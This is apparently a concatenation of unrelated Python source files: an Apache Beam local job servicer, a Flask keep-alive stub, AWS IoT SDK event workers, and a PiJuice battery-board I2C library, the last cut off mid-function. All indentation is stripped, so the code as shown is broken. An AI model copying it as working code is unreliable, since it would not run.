# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
import logging
import os
import queue
import shutil
import subprocess
import tempfile
import threading
import time
import traceback
from builtins import object
from typing import TYPE_CHECKING
from typing import List
from typing import Optional
import grpc
from google.protobuf import text_format # type: ignore # not in typeshed
from apache_beam.metrics import monitoring_infos
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import abstract_job_service
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability.fn_api_runner import fn_runner
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.portability.api import beam_runner_api_pb2
_LOGGER = logging.getLogger(__name__)
def _iter_queue(q):
while True:
yield q.get(block=True)
class LocalJobServicer(abstract_job_service.AbstractJobServiceServicer):
"""Manages one or more pipelines, possibly concurrently.
Experimental: No backward compatibility guaranteed.
Servicer for the Beam Job API.
This JobService uses a basic local implementation of runner to run the job.
This JobService is not capable of managing job on remote clusters.
By default, this JobService executes the job in process but still uses GRPC
to communicate pipeline and worker state. It can also be configured to use
inline calls rather than GRPC (for speed) or launch completely separate
subprocesses for the runner and worker(s).
"""
def __init__(self, staging_dir=None):
super(LocalJobServicer, self).__init__()
self._cleanup_staging_dir = staging_dir is None
self._staging_dir = staging_dir or tempfile.mkdtemp()
self._artifact_service = artifact_service.BeamFilesystemArtifactService(
self._staging_dir)
self._artifact_staging_endpoint = None # type: Optional[endpoints_pb2.ApiServiceDescriptor]
def create_beam_job(self,
preparation_id, # stype: str
job_name, # type: str
pipeline, # type: beam_runner_api_pb2.Pipeline
options # type: struct_pb2.Struct
):
# type: (...) -> BeamJob
# TODO(angoenka): Pass an appropriate staging_session_token. The token can
# be obtained in PutArtifactResponse from JobService
if not self._artifact_staging_endpoint:
# The front-end didn't try to stage anything, but the worker may
# request what's here so we should at least store an empty manifest.
self._artifact_service.CommitManifest(
beam_artifact_api_pb2.CommitManifestRequest(
staging_session_token=preparation_id,
manifest=beam_artifact_api_pb2.Manifest()))
provision_info = fn_runner.ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
pipeline_options=options,
retrieval_token=self._artifact_service.retrieval_token(
preparation_id)),
self._staging_dir,
job_name=job_name)
return BeamJob(
preparation_id,
pipeline,
options,
provision_info,
self._artifact_staging_endpoint)
def get_bind_address(self):
"""Return the address used to open the port on the gRPC server.
This is often, but not always the same as the service address. For
example, to make the service accessible to external machines, override this
to return '[::]' and override `get_service_address()` to return a publicly
accessible host name.
"""
return self.get_service_address()
def get_service_address(self):
"""Return the host name at which this server will be accessible.
In particular, this is provided to the client upon connection as the
artifact staging endpoint.
"""
return 'localhost'
def start_grpc_server(self, port=0):
self._server = grpc.server(UnboundedThreadPoolExecutor())
port = self._server.add_insecure_port(
'%s:%d' % (self.get_bind_address(), port))
beam_job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self._server)
beam_artifact_api_pb2_grpc.add_ArtifactStagingServiceServicer_to_server(
self._artifact_service, self._server)
hostname = self.get_service_address()
self._artifact_staging_endpoint = endpoints_pb2.ApiServiceDescriptor(
url='%s:%d' % (hostname, port))
self._server.start()
_LOGGER.info('Grpc server started at %s on port %d' % (hostname, port))
return port
def stop(self, timeout=1):
self._server.stop(timeout)
if os.path.exists(self._staging_dir) and self._cleanup_staging_dir:
shutil.rmtree(self._staging_dir, ignore_errors=True)
def GetJobMetrics(self, request, context=None):
if request.job_id not in self._jobs:
raise LookupError("Job {} does not exist".format(request.job_id))
result = self._jobs[request.job_id].result
monitoring_info_list = []
for mi in result._monitoring_infos_by_stage.values():
monitoring_info_list.extend(mi)
# Filter out system metrics
user_monitoring_info_list = [
x for x in monitoring_info_list
if monitoring_infos._is_user_monitoring_info(x) or
monitoring_infos._is_user_distribution_monitoring_info(x)
]
return beam_job_api_pb2.GetJobMetricsResponse(
metrics=beam_job_api_pb2.MetricResults(
committed=user_monitoring_info_list))
class SubprocessSdkWorker(object):
"""Manages a SDK worker implemented as a subprocess communicating over grpc.
"""
def __init__(
self,
worker_command_line, # type: bytes
control_address,
worker_id=None):
self._worker_command_line = worker_command_line
self._control_address = control_address
self._worker_id = worker_id
def run(self):
logging_server = grpc.server(UnboundedThreadPoolExecutor())
logging_port = logging_server.add_insecure_port('[::]:0')
logging_server.start()
logging_servicer = BeamFnLoggingServicer()
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
logging_servicer, logging_server)
logging_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url='localhost:%s' % logging_port))
control_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url=self._control_address))
env_dict = dict(
os.environ,
CONTROL_API_SERVICE_DESCRIPTOR=control_descriptor,
LOGGING_API_SERVICE_DESCRIPTOR=logging_descriptor)
# only add worker_id when it is set.
if self._worker_id:
env_dict['WORKER_ID'] = self._worker_id
with fn_runner.SUBPROCESS_LOCK:
p = subprocess.Popen(self._worker_command_line, shell=True, env=env_dict)
try:
p.wait()
if p.returncode:
raise RuntimeError(
'Worker subprocess exited with return code %s' % p.returncode)
finally:
if p.poll() is None:
p.kill()
logging_server.stop(0)
class BeamJob(abstract_job_service.AbstractBeamJob):
"""This class handles running and managing a single pipeline.
The current state of the pipeline is available as self.state.
"""
def __init__(self,
job_id, # type: str
pipeline,
options,
provision_info, # type: fn_runner.ExtendedProvisionInfo
artifact_staging_endpoint # type: Optional[endpoints_pb2.ApiServiceDescriptor]
):
super(BeamJob,
self).__init__(job_id, provision_info.job_name, pipeline, options)
self._provision_info = provision_info
self._artifact_staging_endpoint = artifact_staging_endpoint
self._state_queues = [] # type: List[queue.Queue]
self._log_queues = [] # type: List[queue.Queue]
self.daemon = True
self.result = None
def set_state(self, new_state):
"""Set the latest state as an int enum and notify consumers"""
timestamp = super(BeamJob, self).set_state(new_state)
if timestamp is not None:
# Inform consumers of the new state.
for queue in self._state_queues:
queue.put((new_state, timestamp))
def prepare(self):
pass
def artifact_staging_endpoint(self):
return self._artifact_staging_endpoint
def run(self):
self.set_state(beam_job_api_pb2.JobState.STARTING)
self._run_thread = threading.Thread(target=self._run_job)
self._run_thread.start()
def _run_job(self):
self.set_state(beam_job_api_pb2.JobState.RUNNING)
with JobLogHandler(self._log_queues):
try:
result = fn_runner.FnApiRunner(
provision_info=self._provision_info).run_via_runner_api(
self._pipeline_proto)
_LOGGER.info('Successfully completed job.')
self.set_state(beam_job_api_pb2.JobState.DONE)
self.result = result
except: # pylint: disable=bare-except
_LOGGER.exception('Error running pipeline.')
_LOGGER.exception(traceback)
self.set_state(beam_job_api_pb2.JobState.FAILED)
raise
def cancel(self):
if not self.is_terminal_state(self.state):
self.set_state(beam_job_api_pb2.JobState.CANCELLING)
# TODO(robertwb): Actually cancel...
self.set_state(beam_job_api_pb2.JobState.CANCELLED)
def get_state_stream(self):
# Register for any new state changes.
state_queue = queue.Queue()
self._state_queues.append(state_queue)
for state, timestamp in self.with_state_history(_iter_queue(state_queue)):
yield state, timestamp
if self.is_terminal_state(state):
break
def get_message_stream(self):
# Register for any new messages.
log_queue = queue.Queue()
self._log_queues.append(log_queue)
self._state_queues.append(log_queue)
for msg in self.with_state_history(_iter_queue(log_queue)):
if isinstance(msg, tuple):
assert len(msg) == 2 and isinstance(msg[0], int)
current_state = msg[0]
yield msg
if self.is_terminal_state(current_state):
break
else:
yield msg
class BeamFnLoggingServicer(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
def Logging(self, log_bundles, context=None):
for log_bundle in log_bundles:
for log_entry in log_bundle.log_entries:
_LOGGER.info('Worker: %s', str(log_entry).replace('\n', ' '))
return iter([])
class JobLogHandler(logging.Handler):
"""Captures logs to be returned via the Beam Job API.
Enabled via the with statement."""
# Mapping from logging levels to LogEntry levels.
LOG_LEVEL_MAP = {
logging.FATAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.CRITICAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.ERROR: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.WARNING: beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING,
logging.INFO: beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC,
logging.DEBUG: beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG,
}
def __init__(self, log_queues):
super(JobLogHandler, self).__init__()
self._last_id = 0
self._logged_thread = None
self._log_queues = log_queues
def __enter__(self):
# Remember the current thread to demultiplex the logs of concurrently
# running pipelines (as Python log handlers are global).
self._logged_thread = threading.current_thread()
logging.getLogger().addHandler(self)
def __exit__(self, *args):
self._logged_thread = None
self.close()
def _next_id(self):
self._last_id += 1
return str(self._last_id)
def emit(self, record):
if self._logged_thread is threading.current_thread():
msg = beam_job_api_pb2.JobMessage(
message_id=self._next_id(),
time=time.strftime(
'%Y-%m-%d %H:%M:%S.', time.localtime(record.created)),
importance=self.LOG_LEVEL_MAP[record.levelno],
message_text=self.format(record))
# Inform all message consumers.
for queue in self._log_queues:
queue.put(msg)
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "papicito is sexy"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
workers.py
|
# /*
# * Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# *
# * Licensed under the Apache License, Version 2.0 (the "License").
# * You may not use this file except in compliance with the License.
# * A copy of the License is located at
# *
# * http://aws.amazon.com/apache2.0
# *
# * or in the "license" file accompanying this file. This file is distributed
# * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# * express or implied. See the License for the specific language governing
# * permissions and limitations under the License.
# */
import time
import logging
from threading import Thread
from threading import Event
from AWSIoTPythonSDK.core.protocol.internal.events import EventTypes
from AWSIoTPythonSDK.core.protocol.internal.events import FixedEventMids
from AWSIoTPythonSDK.core.protocol.internal.clients import ClientStatus
from AWSIoTPythonSDK.core.protocol.internal.queues import OfflineRequestQueue
from AWSIoTPythonSDK.core.protocol.internal.requests import RequestTypes
from AWSIoTPythonSDK.core.protocol.paho.client import topic_matches_sub
from AWSIoTPythonSDK.core.protocol.internal.defaults import DEFAULT_DRAINING_INTERNAL_SEC
class EventProducer(object):
_logger = logging.getLogger(__name__)
def __init__(self, cv, event_queue):
self._cv = cv
self._event_queue = event_queue
def on_connect(self, client, user_data, flags, rc):
self._add_to_queue(FixedEventMids.CONNACK_MID, EventTypes.CONNACK, rc)
self._logger.debug("Produced [connack] event")
def on_disconnect(self, client, user_data, rc):
self._add_to_queue(FixedEventMids.DISCONNECT_MID, EventTypes.DISCONNECT, rc)
self._logger.debug("Produced [disconnect] event")
def on_publish(self, client, user_data, mid):
self._add_to_queue(mid, EventTypes.PUBACK, None)
self._logger.debug("Produced [puback] event")
def on_subscribe(self, client, user_data, mid, granted_qos):
self._add_to_queue(mid, EventTypes.SUBACK, granted_qos)
self._logger.debug("Produced [suback] event")
def on_unsubscribe(self, client, user_data, mid):
self._add_to_queue(mid, EventTypes.UNSUBACK, None)
self._logger.debug("Produced [unsuback] event")
def on_message(self, client, user_data, message):
self._add_to_queue(FixedEventMids.MESSAGE_MID, EventTypes.MESSAGE, message)
self._logger.debug("Produced [message] event")
def _add_to_queue(self, mid, event_type, data):
with self._cv:
self._event_queue.put((mid, event_type, data))
self._cv.notify()
class EventConsumer(object):
MAX_DISPATCH_INTERNAL_SEC = 0.3
_logger = logging.getLogger(__name__)
def __init__(self, cv, event_queue, internal_async_client,
subscription_manager, offline_requests_manager, client_status):
self._cv = cv
self._event_queue = event_queue
self._internal_async_client = internal_async_client
self._subscription_manager = subscription_manager
self._offline_requests_manager = offline_requests_manager
self._client_status = client_status
self._is_running = False
self._draining_interval_sec = DEFAULT_DRAINING_INTERNAL_SEC
self._dispatch_methods = {
EventTypes.CONNACK : self._dispatch_connack,
EventTypes.DISCONNECT : self._dispatch_disconnect,
EventTypes.PUBACK : self._dispatch_puback,
EventTypes.SUBACK : self._dispatch_suback,
EventTypes.UNSUBACK : self._dispatch_unsuback,
EventTypes.MESSAGE : self._dispatch_message
}
self._offline_request_handlers = {
RequestTypes.PUBLISH : self._handle_offline_publish,
RequestTypes.SUBSCRIBE : self._handle_offline_subscribe,
RequestTypes.UNSUBSCRIBE : self._handle_offline_unsubscribe
}
self._stopper = Event()
def update_offline_requests_manager(self, offline_requests_manager):
self._offline_requests_manager = offline_requests_manager
def update_draining_interval_sec(self, draining_interval_sec):
self._draining_interval_sec = draining_interval_sec
def get_draining_interval_sec(self):
return self._draining_interval_sec
def is_running(self):
return self._is_running
def start(self):
self._stopper.clear()
self._is_running = True
dispatch_events = Thread(target=self._dispatch)
dispatch_events.daemon = True
dispatch_events.start()
self._logger.debug("Event consuming thread started")
def stop(self):
if self._is_running:
self._is_running = False
self._clean_up()
self._logger.debug("Event consuming thread stopped")
def _clean_up(self):
self._logger.debug("Cleaning up before stopping event consuming")
with self._event_queue.mutex:
self._event_queue.queue.clear()
self._logger.debug("Event queue cleared")
self._internal_async_client.stop_background_network_io()
self._logger.debug("Network thread stopped")
self._internal_async_client.clean_up_event_callbacks()
self._logger.debug("Event callbacks cleared")
def wait_until_it_stops(self, timeout_sec):
self._logger.debug("Waiting for event consumer to completely stop")
return self._stopper.wait(timeout=timeout_sec)
def is_fully_stopped(self):
return self._stopper.is_set()
def _dispatch(self):
while self._is_running:
with self._cv:
if self._event_queue.empty():
self._cv.wait(self.MAX_DISPATCH_INTERNAL_SEC)
else:
while not self._event_queue.empty():
self._dispatch_one()
self._stopper.set()
self._logger.debug("Exiting dispatching loop...")
def _dispatch_one(self):
mid, event_type, data = self._event_queue.get()
if mid:
self._dispatch_methods[event_type](mid, data)
self._internal_async_client.invoke_event_callback(mid, data=data)
# We need to make sure disconnect event gets dispatched and then we stop the consumer
if self._need_to_stop_dispatching(mid):
self.stop()
def _need_to_stop_dispatching(self, mid):
status = self._client_status.get_status()
return (ClientStatus.USER_DISCONNECT == status or ClientStatus.CONNECT == status) \
and mid == FixedEventMids.DISCONNECT_MID
def _dispatch_connack(self, mid, rc):
status = self._client_status.get_status()
self._logger.debug("Dispatching [connack] event")
if self._need_recover():
if ClientStatus.STABLE != status: # To avoid multiple connack dispatching
self._logger.debug("Has recovery job")
clean_up_debt = Thread(target=self._clean_up_debt)
clean_up_debt.start()
else:
self._logger.debug("No need for recovery")
self._client_status.set_status(ClientStatus.STABLE)
def _need_recover(self):
return self._subscription_manager.list_records() or self._offline_requests_manager.has_more()
def _clean_up_debt(self):
self._handle_resubscribe()
self._handle_draining()
self._client_status.set_status(ClientStatus.STABLE)
def _handle_resubscribe(self):
subscriptions = self._subscription_manager.list_records()
if subscriptions and not self._has_user_disconnect_request():
self._logger.debug("Start resubscribing")
self._client_status.set_status(ClientStatus.RESUBSCRIBE)
for topic, (qos, message_callback) in subscriptions:
if self._has_user_disconnect_request():
self._logger.debug("User disconnect detected")
break
self._internal_async_client.subscribe(topic, qos)
def _handle_draining(self):
if self._offline_requests_manager.has_more() and not self._has_user_disconnect_request():
self._logger.debug("Start draining")
self._client_status.set_status(ClientStatus.DRAINING)
while self._offline_requests_manager.has_more():
if self._has_user_disconnect_request():
self._logger.debug("User disconnect detected")
break
offline_request = self._offline_requests_manager.get_next()
if offline_request:
self._offline_request_handlers[offline_request.type](offline_request)
time.sleep(self._draining_interval_sec)
def _has_user_disconnect_request(self):
return ClientStatus.USER_DISCONNECT == self._client_status.get_status()
def _dispatch_disconnect(self, mid, rc):
self._logger.debug("Dispatching [disconnect] event")
status = self._client_status.get_status()
if ClientStatus.USER_DISCONNECT == status or ClientStatus.CONNECT == status:
pass
else:
self._client_status.set_status(ClientStatus.ABNORMAL_DISCONNECT)
# For puback, suback and unsuback, ack callback invocation is handled in dispatch_one
# Do nothing in the event dispatching itself
def _dispatch_puback(self, mid, rc):
self._logger.debug("Dispatching [puback] event")
def _dispatch_suback(self, mid, rc):
self._logger.debug("Dispatching [suback] event")
def _dispatch_unsuback(self, mid, rc):
self._logger.debug("Dispatching [unsuback] event")
def _dispatch_message(self, mid, message):
self._logger.debug("Dispatching [message] event")
subscriptions = self._subscription_manager.list_records()
if subscriptions:
for topic, (qos, message_callback) in subscriptions:
if topic_matches_sub(topic, message.topic) and message_callback:
message_callback(None, None, message) # message_callback(client, userdata, message)
def _handle_offline_publish(self, request):
topic, payload, qos, retain = request.data
self._internal_async_client.publish(topic, payload, qos, retain)
self._logger.debug("Processed offline publish request")
def _handle_offline_subscribe(self, request):
topic, qos, message_callback = request.data
self._subscription_manager.add_record(topic, qos, message_callback)
self._internal_async_client.subscribe(topic, qos)
self._logger.debug("Processed offline subscribe request")
def _handle_offline_unsubscribe(self, request):
topic = request.data
self._subscription_manager.remove_record(topic)
self._internal_async_client.unsubscribe(topic)
self._logger.debug("Processed offline unsubscribe request")
class SubscriptionManager(object):
_logger = logging.getLogger(__name__)
def __init__(self):
self._subscription_map = dict()
def add_record(self, topic, qos, message_callback):
self._logger.debug("Adding a new subscription record: %s qos: %d", topic, qos)
self._subscription_map[topic] = qos, message_callback # message_callback could be None
def remove_record(self, topic):
self._logger.debug("Removing subscription record: %s", topic)
if self._subscription_map.get(topic): # Ignore topics that are never subscribed to
del self._subscription_map[topic]
else:
self._logger.warn("Removing attempt for non-exist subscription record: %s", topic)
def list_records(self):
return list(self._subscription_map.items())
class OfflineRequestsManager(object):
_logger = logging.getLogger(__name__)
def __init__(self, max_size, drop_behavior):
self._queue = OfflineRequestQueue(max_size, drop_behavior)
def has_more(self):
return len(self._queue) > 0
def add_one(self, request):
return self._queue.append(request)
def get_next(self):
if self.has_more():
return self._queue.pop(0)
else:
return None
|
pijuice.py
|
#!/usr/bin/env python3
__version__ = "1.8"
import ctypes
import sys
import threading
import time
from smbus import SMBus
pijuice_hard_functions = ['HARD_FUNC_POWER_ON', 'HARD_FUNC_POWER_OFF', 'HARD_FUNC_RESET']
pijuice_sys_functions = ['SYS_FUNC_HALT', 'SYS_FUNC_HALT_POW_OFF', 'SYS_FUNC_SYS_OFF_HALT', 'SYS_FUNC_REBOOT']
pijuice_user_functions = ['USER_EVENT'] + ['USER_FUNC' + str(i+1) for i in range(0, 15)]
class PiJuiceInterface(object):
def __init__(self, bus=1, address=0x14):
"""Create a new PiJuice instance. Bus is an optional parameter that
specifies the I2C bus number to use, for example 1 would use device
/dev/i2c-1. If bus is not specified then the open function should be
called to open the bus.
"""
self.i2cbus = SMBus(bus)
self.addr = address
self.t = None
self.comError = False
self.errTime = 0
def __del__(self):
"""Clean up any resources used by the PiJuice instance."""
self.i2cbus = None
def __enter__(self):
"""Context manager enter function."""
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Context manager exit function, ensures resources are cleaned up."""
self.i2cbus = None
return False # Don't suppress exceptions
def GetAddress(self):
return self.addr
def _GetChecksum(self, data):
fcs = 0xFF
for x in data[:]:
fcs = fcs ^ x
return fcs
def _Read(self):
try:
d = self.i2cbus.read_i2c_block_data(self.addr, self.cmd, self.length)
self.d = d
self.comError = False
except: # IOError:
self.comError = True
self.errTime = time.time()
self.d = None
def _Write(self):
try:
self.i2cbus.write_i2c_block_data(self.addr, self.cmd, self.d)
self.comError = False
except: # IOError:
self.comError = True
self.errTime = time.time()
def _DoTransfer(self, oper):
if (self.t != None and self.t.is_alive()) or (self.comError and (time.time()-self.errTime) < 4):
return False
self.t = threading.Thread(target=oper, args=())
self.t.start()
# wait for transfer to finish or timeout
n = 0
while self.t.is_alive() and n < 2:
time.sleep(0.05)
n = n + 1
if self.comError or self.t.is_alive():
return False
return True
def ReadData(self, cmd, length):
d = []
self.cmd = cmd
self.length = length + 1
if not self._DoTransfer(self._Read):
return {'error': 'COMMUNICATION_ERROR'}
d = self.d
if self._GetChecksum(d[0:-1]) != d[-1]:
# With n+1 byte data (n data bytes and 1 checksum byte) sometimes the
# MSbit of the first received data byte is 0 while it should be 1. So we
# repeat the checksum test with the MSbit of the first data byte set to 1.
d[0] |= 0x80
if self._GetChecksum(d[0:-1]) == d[-1]:
del d[-1]
return {'data': d, 'error': 'NO_ERROR'}
return {'error': 'DATA_CORRUPTED'}
del d[-1]
return {'data': d, 'error': 'NO_ERROR'}
def WriteData(self, cmd, data):
fcs = self._GetChecksum(data)
d = data[:]
d.append(fcs)
self.cmd = cmd
self.d = d
if not self._DoTransfer(self._Write):
return {'error': 'COMMUNICATION_ERROR'}
return {'error': 'NO_ERROR'}
def WriteDataVerify(self, cmd, data, delay=None):
wresult = self.WriteData(cmd, data)
if wresult['error'] != 'NO_ERROR':
return wresult
else:
if delay != None:
try:
time.sleep(delay*1)
except:
time.sleep(0.1)
result = self.ReadData(cmd, len(data))
if result['error'] != 'NO_ERROR':
return result
else:
if (data == result['data']):
return {'error': 'NO_ERROR'}
else:
return {'error': 'WRITE_FAILED'}
class PiJuiceStatus(object):
STATUS_CMD = 0x40
FAULT_EVENT_CMD = 0x44
CHARGE_LEVEL_CMD = 0x41
BUTTON_EVENT_CMD = 0x45
BATTERY_TEMPERATURE_CMD = 0x47
BATTERY_VOLTAGE_CMD = 0x49
BATTERY_CURRENT_CMD = 0x4b
IO_VOLTAGE_CMD = 0x4d
IO_CURRENT_CMD = 0x4f
LED_STATE_CMD = 0x66
LED_BLINK_CMD = 0x68
IO_PIN_ACCESS_CMD = 0x75
def __init__(self, interface):
self.interface = interface
def __enter__(self):
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False # Don't suppress exceptions.
def GetStatus(self):
result = self.interface.ReadData(self.STATUS_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data'][0]
status = {}
status['isFault'] = bool(d & 0x01)
status['isButton'] = bool(d & 0x02)
batStatusEnum = ['NORMAL', 'CHARGING_FROM_IN',
'CHARGING_FROM_5V_IO', 'NOT_PRESENT']
status['battery'] = batStatusEnum[(d >> 2) & 0x03]
powerInStatusEnum = ['NOT_PRESENT', 'BAD', 'WEAK', 'PRESENT']
status['powerInput'] = powerInStatusEnum[(d >> 4) & 0x03]
status['powerInput5vIo'] = powerInStatusEnum[(d >> 6) & 0x03]
return {'data': status, 'error': 'NO_ERROR'}
def GetChargeLevel(self):
result = self.interface.ReadData(self.CHARGE_LEVEL_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
return {'data': result['data'][0], 'error': 'NO_ERROR'}
faultEvents = ['button_power_off', 'forced_power_off',
'forced_sys_power_off', 'watchdog_reset']
faults = ['battery_profile_invalid', 'charging_temperature_fault']
def GetFaultStatus(self):
result = self.interface.ReadData(self.FAULT_EVENT_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data'][0]
fault = {}
if d & 0x01:
fault['button_power_off'] = True
if d & 0x02:
fault['forced_power_off'] = True # bool(d & 0x02)
if d & 0x04:
fault['forced_sys_power_off'] = True
if d & 0x08:
fault['watchdog_reset'] = True
if d & 0x20:
fault['battery_profile_invalid'] = True
batChargingTempEnum = ['NORMAL', 'SUSPEND', 'COOL', 'WARM']
if (d >> 6) & 0x03:
fault['charging_temperature_fault'] = batChargingTempEnum[(d >> 6) & 0x03]
return {'data': fault, 'error': 'NO_ERROR'}
def ResetFaultFlags(self, flags):
d = 0xFF
for ev in flags:
try:
d = d & ~(0x01 << self.faultEvents.index(ev))
except:
ev
self.interface.WriteData(self.FAULT_EVENT_CMD, [d]) # clear fault events
buttonEvents = ['NO_EVENT', 'PRESS', 'RELEASE',
'SINGLE_PRESS', 'DOUBLE_PRESS', 'LONG_PRESS1', 'LONG_PRESS2']
def GetButtonEvents(self):
result = self.interface.ReadData(self.BUTTON_EVENT_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
event = {}
try:
event['SW1'] = self.buttonEvents[d[0] & 0x0F]
except:
event['SW1'] = 'UNKNOWN'
try:
event['SW2'] = self.buttonEvents[(d[0] >> 4) & 0x0F]
except:
event['SW2'] = 'UNKNOWN'
try:
event['SW3'] = self.buttonEvents[d[1] & 0x0F]
except:
event['SW3'] = 'UNKNOWN'
#event['SW4'] = self.buttonEvents[(d[1] >> 4) & 0x0F]
return {'data': event, 'error': 'NO_ERROR'}
buttons = ['SW' + str(i+1) for i in range(0, 3)]
def AcceptButtonEvent(self, button):
b = None
try:
b = self.buttons.index(button)
except ValueError:
return {'error': 'BAD_ARGUMENT'}
d = [0xF0, 0xFF] if b == 0 else [0x0F, 0xFF] if b == 1 else [0xFF, 0xF0]
self.interface.WriteData(self.BUTTON_EVENT_CMD, d) # clear button events
def GetBatteryTemperature(self):
result = self.interface.ReadData(self.BATTERY_TEMPERATURE_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
temp = d[0]
if (d[0] & (1 << 7)):
temp = temp - (1 << 8)
return {'data': temp, 'error': 'NO_ERROR'}
def GetBatteryVoltage(self):
result = self.interface.ReadData(self.BATTERY_VOLTAGE_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
return {'data': (d[1] << 8) | d[0], 'error': 'NO_ERROR'}
def GetBatteryCurrent(self):
result = self.interface.ReadData(self.BATTERY_CURRENT_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
i = (d[1] << 8) | d[0]
if (i & (1 << 15)):
i = i - (1 << 16)
return {'data': i, 'error': 'NO_ERROR'}
def GetIoVoltage(self):
result = self.interface.ReadData(self.IO_VOLTAGE_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
return {'data': (d[1] << 8) | d[0], 'error': 'NO_ERROR'}
def GetIoCurrent(self):
result = self.interface.ReadData(self.IO_CURRENT_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
i = (d[1] << 8) | d[0]
if (i & (1 << 15)):
i = i - (1 << 16)
return {'data': i, 'error': 'NO_ERROR'}
leds = ['D1', 'D2']
def SetLedState(self, led, rgb):
i = None
try:
i = self.leds.index(led)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.LED_STATE_CMD + i, rgb)
def GetLedState(self, led):
i = None
try:
i = self.leds.index(led)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.ReadData(self.LED_STATE_CMD + i, 3)
def SetLedBlink(self, led, count, rgb1, period1, rgb2, period2):
i = None
d = None
try:
i = self.leds.index(led)
d = [count & 0xFF] + rgb1*1 + \
[(period1//10) & 0xFF] + rgb2*1 + [(period2//10) & 0xFF]
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.LED_BLINK_CMD + i, d)
def GetLedBlink(self, led):
i = None
try:
i = self.leds.index(led)
except:
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.LED_BLINK_CMD + i, 9)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
return {
'data': {
'count': d[0],
'rgb1': d[1:4],
'period1': d[4] * 10,
'rgb2': d[5:8],
'period2': d[8] * 10
},
'error': 'NO_ERROR'
}
def GetIoDigitalInput(self, pin):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
b = 1 if d[0] == 0x01 else 0
return {'data': b, 'error': 'NO_ERROR'}
def SetIoDigitalOutput(self, pin, value):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
d = [0x00, 0x00]
d[1] = 0x00 if value == 0 else 0x01
return self.interface.WriteData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, d)
def GetIoDigitalOutput(self, pin):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
b = 1 if d[1] == 0x01 else 0
return {'data': b, 'error': 'NO_ERROR'}
def GetIoAnalogInput(self, pin):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
return {'data': (d[1] << 8) | d[0], 'error': 'NO_ERROR'}
def SetIoPWM(self, pin, dutyCycle):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
d = [0xFF, 0xFF]
try:
dc = float(dutyCycle)
except:
return {'error': 'BAD_ARGUMENT'}
if dc < 0 or dc > 100:
return {'error': 'INVALID_DUTY_CYCLE'}
elif dc < 100:
dci = int(round(dc * 65534 // 100))
d[0] = dci & 0xFF
d[1] = (dci >> 8) & 0xFF
return self.interface.WriteData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, d)
def GetIoPWM(self, pin):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
